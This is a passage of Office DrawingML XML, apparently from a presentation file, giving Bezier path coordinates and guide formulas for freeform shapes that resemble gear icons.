                    <a:pt x="570" y="431"/>
                    <a:pt x="577" y="416"/>
                    <a:pt x="581" y="400"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="557" y="400"/>
                    <a:pt x="537" y="379"/>
                    <a:pt x="537" y="354"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="537" y="281"/>
                    <a:pt x="537" y="281"/>
                    <a:pt x="537" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="537" y="256"/>
                    <a:pt x="557" y="236"/>
                    <a:pt x="581" y="235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="576" y="220"/>
                    <a:pt x="570" y="204"/>
                    <a:pt x="562" y="190"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="554" y="197"/>
                    <a:pt x="543" y="202"/>
                    <a:pt x="531" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="531" y="202"/>
                    <a:pt x="531" y="202"/>
                    <a:pt x="531" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="519" y="202"/>
                    <a:pt x="507" y="197"/>
                    <a:pt x="499" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="447" y="137"/>
                    <a:pt x="447" y="137"/>
                    <a:pt x="447" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="438" y="128"/>
                    <a:pt x="434" y="116"/>
                    <a:pt x="434" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="434" y="93"/>
                    <a:pt x="438" y="82"/>
                    <a:pt x="446" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="431" y="66"/>
                    <a:pt x="416" y="59"/>
                    <a:pt x="400" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="79"/>
                    <a:pt x="379" y="98"/>
                    <a:pt x="354" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="281" y="98"/>
                    <a:pt x="281" y="98"/>
                    <a:pt x="281" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="256" y="98"/>
                    <a:pt x="236" y="79"/>
                    <a:pt x="235" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="59"/>
                    <a:pt x="205" y="66"/>
                    <a:pt x="190" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="81"/>
                    <a:pt x="202" y="92"/>
                    <a:pt x="202" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="116"/>
                    <a:pt x="197" y="128"/>
                    <a:pt x="189" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="167" y="159"/>
                    <a:pt x="167" y="159"/>
                    <a:pt x="167" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="168"/>
                    <a:pt x="141" y="168"/>
                    <a:pt x="131" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="149"/>
                    <a:pt x="121" y="133"/>
                    <a:pt x="131" y="123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0" y="94"/>
                    <a:pt x="136" y="80"/>
                    <a:pt x="138" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="51"/>
                    <a:pt x="148" y="39"/>
                    <a:pt x="161" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="20"/>
                    <a:pt x="204" y="11"/>
                    <a:pt x="227" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="241" y="0"/>
                    <a:pt x="255" y="3"/>
                    <a:pt x="267" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="279" y="21"/>
                    <a:pt x="285" y="34"/>
                    <a:pt x="285" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="48"/>
                    <a:pt x="350" y="48"/>
                    <a:pt x="350" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="34"/>
                    <a:pt x="357" y="21"/>
                    <a:pt x="368" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="380" y="3"/>
                    <a:pt x="395" y="0"/>
                    <a:pt x="409" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="431" y="11"/>
                    <a:pt x="454" y="20"/>
                    <a:pt x="475" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="488" y="39"/>
                    <a:pt x="496" y="51"/>
                    <a:pt x="498" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="500" y="80"/>
                    <a:pt x="495" y="94"/>
                    <a:pt x="485" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="531" y="150"/>
                    <a:pt x="531" y="150"/>
                    <a:pt x="531" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="541" y="140"/>
                    <a:pt x="555" y="135"/>
                    <a:pt x="570" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="584" y="139"/>
                    <a:pt x="596" y="148"/>
                    <a:pt x="603" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="615" y="181"/>
                    <a:pt x="624" y="204"/>
                    <a:pt x="631" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="635" y="241"/>
                    <a:pt x="632" y="255"/>
                    <a:pt x="624" y="267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="615" y="279"/>
                    <a:pt x="602" y="285"/>
                    <a:pt x="587" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="587" y="285"/>
                    <a:pt x="587" y="285"/>
                    <a:pt x="587" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="587" y="350"/>
                    <a:pt x="587" y="350"/>
                    <a:pt x="587" y="350"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="602" y="350"/>
                    <a:pt x="615" y="357"/>
                    <a:pt x="624" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="633" y="380"/>
                    <a:pt x="635" y="395"/>
                    <a:pt x="631" y="408"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="625" y="431"/>
                    <a:pt x="615" y="454"/>
                    <a:pt x="604" y="475"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="597" y="488"/>
                    <a:pt x="585" y="496"/>
                    <a:pt x="570" y="498"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="556" y="500"/>
                    <a:pt x="542" y="495"/>
                    <a:pt x="531" y="485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86" y="531"/>
                    <a:pt x="486" y="531"/>
                    <a:pt x="486" y="531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="496" y="541"/>
                    <a:pt x="501" y="555"/>
                    <a:pt x="499" y="570"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="497" y="584"/>
                    <a:pt x="488" y="596"/>
                    <a:pt x="476" y="603"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="455" y="615"/>
                    <a:pt x="432" y="625"/>
                    <a:pt x="409" y="631"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="404" y="633"/>
                    <a:pt x="400" y="633"/>
                    <a:pt x="396" y="633"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="566" y="186"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="566" y="186"/>
                    <a:pt x="566" y="186"/>
                    <a:pt x="566" y="186"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="528" y="153"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="528" y="153"/>
                    <a:pt x="528" y="153"/>
                    <a:pt x="528" y="153"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="482" y="107"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="482" y="107"/>
                    <a:pt x="482" y="107"/>
                    <a:pt x="482" y="107"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="153" y="107"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="107"/>
                    <a:pt x="153" y="107"/>
                    <a:pt x="153" y="107"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="450" y="69"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="449" y="69"/>
                    <a:pt x="449" y="69"/>
                    <a:pt x="449" y="69"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="450" y="69"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="186" y="69"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="69"/>
                    <a:pt x="186" y="69"/>
                    <a:pt x="186" y="6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42" name="Freeform 361">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DFF20B0-E785-4628-9BFC-020847C991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70541" y="4146407"/>
              <a:ext cx="190821" cy="185125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 124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5 w 256"/>
                <a:gd name="T7" fmla="*/ 90 h 250"/>
                <a:gd name="T8" fmla="*/ 34 w 256"/>
                <a:gd name="T9" fmla="*/ 56 h 250"/>
                <a:gd name="T10" fmla="*/ 200 w 256"/>
                <a:gd name="T11" fmla="*/ 42 h 250"/>
                <a:gd name="T12" fmla="*/ 214 w 256"/>
                <a:gd name="T13" fmla="*/ 208 h 250"/>
                <a:gd name="T14" fmla="*/ 124 w 256"/>
                <a:gd name="T15" fmla="*/ 250 h 250"/>
                <a:gd name="T16" fmla="*/ 51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30 w 256"/>
                <a:gd name="T23" fmla="*/ 200 h 250"/>
                <a:gd name="T24" fmla="*/ 176 w 256"/>
                <a:gd name="T25" fmla="*/ 176 h 250"/>
                <a:gd name="T26" fmla="*/ 191 w 256"/>
                <a:gd name="T27" fmla="*/ 126 h 250"/>
                <a:gd name="T28" fmla="*/ 167 w 256"/>
                <a:gd name="T29" fmla="*/ 80 h 250"/>
                <a:gd name="T30" fmla="*/ 118 w 256"/>
                <a:gd name="T31" fmla="*/ 64 h 250"/>
                <a:gd name="T32" fmla="*/ 72 w 256"/>
                <a:gd name="T33" fmla="*/ 88 h 250"/>
                <a:gd name="T34" fmla="*/ 51 w 256"/>
                <a:gd name="T35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56" h="250">
                  <a:moveTo>
                    <a:pt x="124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2" y="89"/>
                    <a:pt x="35" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="80"/>
                    <a:pt x="25" y="66"/>
                    <a:pt x="34" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="6"/>
                    <a:pt x="150" y="0"/>
                    <a:pt x="200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1" y="236"/>
                    <a:pt x="157" y="250"/>
                    <a:pt x="124" y="250"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="51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3" y="143"/>
                    <a:pt x="61" y="168"/>
                    <a:pt x="80" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="196"/>
                    <a:pt x="112" y="201"/>
                    <a:pt x="130" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="198"/>
                    <a:pt x="164" y="190"/>
                    <a:pt x="176" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="162"/>
                    <a:pt x="193" y="144"/>
                    <a:pt x="191" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="108"/>
                    <a:pt x="181" y="92"/>
                    <a:pt x="167" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="68"/>
                    <a:pt x="136" y="63"/>
                    <a:pt x="118" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="66"/>
                    <a:pt x="84" y="75"/>
                    <a:pt x="72" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="95"/>
                    <a:pt x="58" y="98"/>
                    <a:pt x="51" y="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43" name="Freeform 362">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A3DB971-AF0D-4F22-87FE-10908007E2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12627" y="4311594"/>
              <a:ext cx="472777" cy="472778"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 368 w 635"/>
                <a:gd name="T1" fmla="*/ 623 h 635"/>
                <a:gd name="T2" fmla="*/ 350 w 635"/>
                <a:gd name="T3" fmla="*/ 586 h 635"/>
                <a:gd name="T4" fmla="*/ 267 w 635"/>
                <a:gd name="T5" fmla="*/ 623 h 635"/>
                <a:gd name="T6" fmla="*/ 160 w 635"/>
                <a:gd name="T7" fmla="*/ 603 h 635"/>
                <a:gd name="T8" fmla="*/ 150 w 635"/>
                <a:gd name="T9" fmla="*/ 530 h 635"/>
                <a:gd name="T10" fmla="*/ 104 w 635"/>
                <a:gd name="T11" fmla="*/ 484 h 635"/>
                <a:gd name="T12" fmla="*/ 65 w 635"/>
                <a:gd name="T13" fmla="*/ 497 h 635"/>
                <a:gd name="T14" fmla="*/ 4 w 635"/>
                <a:gd name="T15" fmla="*/ 408 h 635"/>
                <a:gd name="T16" fmla="*/ 48 w 635"/>
                <a:gd name="T17" fmla="*/ 349 h 635"/>
                <a:gd name="T18" fmla="*/ 11 w 635"/>
                <a:gd name="T19" fmla="*/ 266 h 635"/>
                <a:gd name="T20" fmla="*/ 32 w 635"/>
                <a:gd name="T21" fmla="*/ 159 h 635"/>
                <a:gd name="T22" fmla="*/ 105 w 635"/>
                <a:gd name="T23" fmla="*/ 149 h 635"/>
                <a:gd name="T24" fmla="*/ 108 w 635"/>
                <a:gd name="T25" fmla="*/ 187 h 635"/>
                <a:gd name="T26" fmla="*/ 54 w 635"/>
                <a:gd name="T27" fmla="*/ 234 h 635"/>
                <a:gd name="T28" fmla="*/ 98 w 635"/>
                <a:gd name="T29" fmla="*/ 353 h 635"/>
                <a:gd name="T30" fmla="*/ 73 w 635"/>
                <a:gd name="T31" fmla="*/ 445 h 635"/>
                <a:gd name="T32" fmla="*/ 104 w 635"/>
                <a:gd name="T33" fmla="*/ 433 h 635"/>
                <a:gd name="T34" fmla="*/ 188 w 635"/>
                <a:gd name="T35" fmla="*/ 498 h 635"/>
                <a:gd name="T36" fmla="*/ 235 w 635"/>
                <a:gd name="T37" fmla="*/ 581 h 635"/>
                <a:gd name="T38" fmla="*/ 354 w 635"/>
                <a:gd name="T39" fmla="*/ 536 h 635"/>
                <a:gd name="T40" fmla="*/ 446 w 635"/>
                <a:gd name="T41" fmla="*/ 561 h 635"/>
                <a:gd name="T42" fmla="*/ 499 w 635"/>
                <a:gd name="T43" fmla="*/ 446 h 635"/>
                <a:gd name="T44" fmla="*/ 581 w 635"/>
                <a:gd name="T45" fmla="*/ 399 h 635"/>
                <a:gd name="T46" fmla="*/ 537 w 635"/>
                <a:gd name="T47" fmla="*/ 280 h 635"/>
                <a:gd name="T48" fmla="*/ 562 w 635"/>
                <a:gd name="T49" fmla="*/ 189 h 635"/>
                <a:gd name="T50" fmla="*/ 447 w 635"/>
                <a:gd name="T51" fmla="*/ 136 h 635"/>
                <a:gd name="T52" fmla="*/ 400 w 635"/>
                <a:gd name="T53" fmla="*/ 53 h 635"/>
                <a:gd name="T54" fmla="*/ 281 w 635"/>
                <a:gd name="T55" fmla="*/ 97 h 635"/>
                <a:gd name="T56" fmla="*/ 190 w 635"/>
                <a:gd name="T57" fmla="*/ 72 h 635"/>
                <a:gd name="T58" fmla="*/ 166 w 635"/>
                <a:gd name="T59" fmla="*/ 158 h 635"/>
                <a:gd name="T60" fmla="*/ 131 w 635"/>
                <a:gd name="T61" fmla="*/ 122 h 635"/>
                <a:gd name="T62" fmla="*/ 138 w 635"/>
                <a:gd name="T63" fmla="*/ 65 h 635"/>
                <a:gd name="T64" fmla="*/ 227 w 635"/>
                <a:gd name="T65" fmla="*/ 4 h 635"/>
                <a:gd name="T66" fmla="*/ 285 w 635"/>
                <a:gd name="T67" fmla="*/ 47 h 635"/>
                <a:gd name="T68" fmla="*/ 368 w 635"/>
                <a:gd name="T69" fmla="*/ 11 h 635"/>
                <a:gd name="T70" fmla="*/ 475 w 635"/>
                <a:gd name="T71" fmla="*/ 31 h 635"/>
                <a:gd name="T72" fmla="*/ 485 w 635"/>
                <a:gd name="T73" fmla="*/ 103 h 635"/>
                <a:gd name="T74" fmla="*/ 569 w 635"/>
                <a:gd name="T75" fmla="*/ 136 h 635"/>
                <a:gd name="T76" fmla="*/ 631 w 635"/>
                <a:gd name="T77" fmla="*/ 226 h 635"/>
                <a:gd name="T78" fmla="*/ 587 w 635"/>
                <a:gd name="T79" fmla="*/ 284 h 635"/>
                <a:gd name="T80" fmla="*/ 587 w 635"/>
                <a:gd name="T81" fmla="*/ 349 h 635"/>
                <a:gd name="T82" fmla="*/ 631 w 635"/>
                <a:gd name="T83" fmla="*/ 407 h 635"/>
                <a:gd name="T84" fmla="*/ 570 w 635"/>
                <a:gd name="T85" fmla="*/ 497 h 635"/>
                <a:gd name="T86" fmla="*/ 485 w 635"/>
                <a:gd name="T87" fmla="*/ 530 h 635"/>
                <a:gd name="T88" fmla="*/ 499 w 635"/>
                <a:gd name="T89" fmla="*/ 569 h 635"/>
                <a:gd name="T90" fmla="*/ 408 w 635"/>
                <a:gd name="T91" fmla="*/ 631 h 635"/>
                <a:gd name="T92" fmla="*/ 107 w 635"/>
                <a:gd name="T93" fmla="*/ 481 h 635"/>
                <a:gd name="T94" fmla="*/ 69 w 635"/>
                <a:gd name="T95" fmla="*/ 449 h 635"/>
                <a:gd name="T96" fmla="*/ 52 w 635"/>
                <a:gd name="T97" fmla="*/ 240 h 635"/>
                <a:gd name="T98" fmla="*/ 69 w 635"/>
                <a:gd name="T99" fmla="*/ 185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35" h="635">
                  <a:moveTo>
                    <a:pt x="395" y="632"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="386" y="632"/>
                    <a:pt x="376" y="629"/>
                    <a:pt x="368" y="623"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="356" y="614"/>
                    <a:pt x="350" y="601"/>
                    <a:pt x="350" y="587"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="586"/>
                    <a:pt x="350" y="586"/>
                    <a:pt x="350" y="586"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="285" y="587"/>
                    <a:pt x="285" y="587"/>
                    <a:pt x="285" y="587"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="285" y="601"/>
                    <a:pt x="279" y="614"/>
                    <a:pt x="267" y="623"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="255" y="632"/>
                    <a:pt x="241" y="635"/>
                    <a:pt x="227" y="631"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="624"/>
                    <a:pt x="181" y="614"/>
                    <a:pt x="160" y="603"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="596"/>
                    <a:pt x="139" y="583"/>
                    <a:pt x="137" y="569"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="555"/>
                    <a:pt x="139" y="540"/>
                    <a:pt x="150" y="530"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="530"/>
                    <a:pt x="150" y="530"/>
                    <a:pt x="150" y="530"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="484"/>
                    <a:pt x="104" y="484"/>
                    <a:pt x="104" y="484"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="485"/>
                    <a:pt x="104" y="485"/>
                    <a:pt x="104" y="485"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="495"/>
                    <a:pt x="79" y="499"/>
                    <a:pt x="65" y="497"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="495"/>
                    <a:pt x="39" y="487"/>
                    <a:pt x="32" y="474"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="453"/>
                    <a:pt x="11" y="431"/>
                    <a:pt x="4" y="408"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="394"/>
                    <a:pt x="3" y="379"/>
                    <a:pt x="11" y="367"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="356"/>
                    <a:pt x="33" y="349"/>
                    <a:pt x="48" y="349"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="284"/>
                    <a:pt x="48" y="284"/>
                    <a:pt x="48" y="284"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="284"/>
                    <a:pt x="20" y="278"/>
                    <a:pt x="11" y="266"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="254"/>
                    <a:pt x="0" y="240"/>
                    <a:pt x="4" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="203"/>
                    <a:pt x="20" y="180"/>
                    <a:pt x="32" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="146"/>
                    <a:pt x="52" y="138"/>
                    <a:pt x="66" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="134"/>
                    <a:pt x="94" y="139"/>
                    <a:pt x="105" y="149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17" y="162"/>
                    <a:pt x="117" y="177"/>
                    <a:pt x="108" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="197"/>
                    <a:pt x="83" y="197"/>
                    <a:pt x="73" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="203"/>
                    <a:pt x="59" y="219"/>
                    <a:pt x="54" y="234"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="235"/>
                    <a:pt x="98" y="256"/>
                    <a:pt x="98" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="353"/>
                    <a:pt x="98" y="353"/>
                    <a:pt x="98" y="353"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="378"/>
                    <a:pt x="78" y="398"/>
                    <a:pt x="54" y="399"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="415"/>
                    <a:pt x="65" y="430"/>
                    <a:pt x="73" y="445"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="437"/>
                    <a:pt x="92" y="433"/>
                    <a:pt x="104" y="433"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="433"/>
                    <a:pt x="104" y="433"/>
                    <a:pt x="104" y="433"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="433"/>
                    <a:pt x="128" y="437"/>
                    <a:pt x="136" y="446"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="498"/>
                    <a:pt x="188" y="498"/>
                    <a:pt x="188" y="498"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="515"/>
                    <a:pt x="206" y="544"/>
                    <a:pt x="189" y="562"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="569"/>
                    <a:pt x="219" y="576"/>
                    <a:pt x="235" y="581"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="556"/>
                    <a:pt x="256" y="536"/>
                    <a:pt x="281" y="536"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="536"/>
                    <a:pt x="354" y="536"/>
                    <a:pt x="354" y="536"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="379" y="536"/>
                    <a:pt x="399" y="556"/>
                    <a:pt x="400" y="581"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="416" y="576"/>
                    <a:pt x="431" y="569"/>
                    <a:pt x="446" y="561"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="429" y="544"/>
                    <a:pt x="429" y="515"/>
                    <a:pt x="447" y="498"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="499" y="446"/>
                    <a:pt x="499" y="446"/>
                    <a:pt x="499" y="446"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="516" y="428"/>
                    <a:pt x="544" y="428"/>
                    <a:pt x="562" y="445"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="570" y="430"/>
                    <a:pt x="576" y="415"/>
                    <a:pt x="581" y="399"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="557" y="399"/>
                    <a:pt x="537" y="378"/>
                    <a:pt x="537" y="353"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="537" y="280"/>
                    <a:pt x="537" y="280"/>
                    <a:pt x="537" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="537" y="255"/>
                    <a:pt x="556" y="235"/>
                    <a:pt x="581" y="234"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="576" y="219"/>
                    <a:pt x="570" y="203"/>
                    <a:pt x="562" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="544" y="205"/>
                    <a:pt x="516" y="205"/>
                    <a:pt x="499" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="447" y="136"/>
                    <a:pt x="447" y="136"/>
                    <a:pt x="447" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="429" y="118"/>
                    <a:pt x="429" y="90"/>
                    <a:pt x="445" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="431" y="65"/>
                    <a:pt x="416" y="58"/>
                    <a:pt x="400" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="78"/>
                    <a:pt x="379" y="97"/>
                    <a:pt x="354" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="281" y="97"/>
                    <a:pt x="281" y="97"/>
                    <a:pt x="281" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="256" y="97"/>
                    <a:pt x="236" y="78"/>
                    <a:pt x="235" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="58"/>
                    <a:pt x="205" y="65"/>
                    <a:pt x="190" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="90"/>
                    <a:pt x="206" y="118"/>
                    <a:pt x="189" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="158"/>
                    <a:pt x="166" y="158"/>
                    <a:pt x="166" y="158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="167"/>
                    <a:pt x="141" y="167"/>
                    <a:pt x="131" y="158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="148"/>
                    <a:pt x="121" y="132"/>
                    <a:pt x="131" y="12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40" y="93"/>
                    <a:pt x="136" y="79"/>
                    <a:pt x="138" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="50"/>
                    <a:pt x="148" y="38"/>
                    <a:pt x="161" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="20"/>
                    <a:pt x="204" y="10"/>
                    <a:pt x="227" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="241" y="0"/>
                    <a:pt x="255" y="2"/>
                    <a:pt x="267" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="278" y="20"/>
                    <a:pt x="285" y="33"/>
                    <a:pt x="285" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="47"/>
                    <a:pt x="350" y="47"/>
                    <a:pt x="350" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
